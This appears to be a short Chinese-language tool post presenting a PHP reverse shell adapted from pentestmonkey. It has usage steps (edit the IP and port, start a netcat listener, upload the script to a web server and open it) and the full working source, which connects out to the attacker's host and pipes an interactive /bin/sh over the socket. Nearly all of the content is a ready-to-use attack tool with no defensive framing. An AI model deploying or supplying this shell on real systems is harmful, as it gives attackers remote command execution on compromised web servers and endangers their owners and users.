功能:
返回一个交互式的shell
使用:
先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如:
$ip = '192.168.1.111'; // CHANGE THIS
$port = 13123; // CHANGE THIS
nc -v -l -p 13123
然后上传并在浏览器中打开该PHP脚本文件。
效果图:
源代码(在原文的基础进行了修改):
<?php
set_time_limit (0);
$ip = "192.168.1.111";
$port = "13123";
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock)
exit("$errstr ($errno)");
if(function_exists('proc_open')){
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("id;/bin/sh -i", $descriptorspec, $pipes);
if (!is_resource($process))
exit("ERROR: Can't reverse shell");
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
print("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
print("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
print("ERROR: Shell process terminated");
break;
}
$input = fread($sock, 1024);
fwrite($pipes[0], $input);
$output = fread($pipes[1], 1024);
fwrite($sock, $output);
$output = fread($pipes[2], 1024);
fwrite($sock, $output);
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
else print "function 'proc_open' is not exists.";
?>
原文:http://pentestmonkey.net/tools/web-shells/php-reverse-shell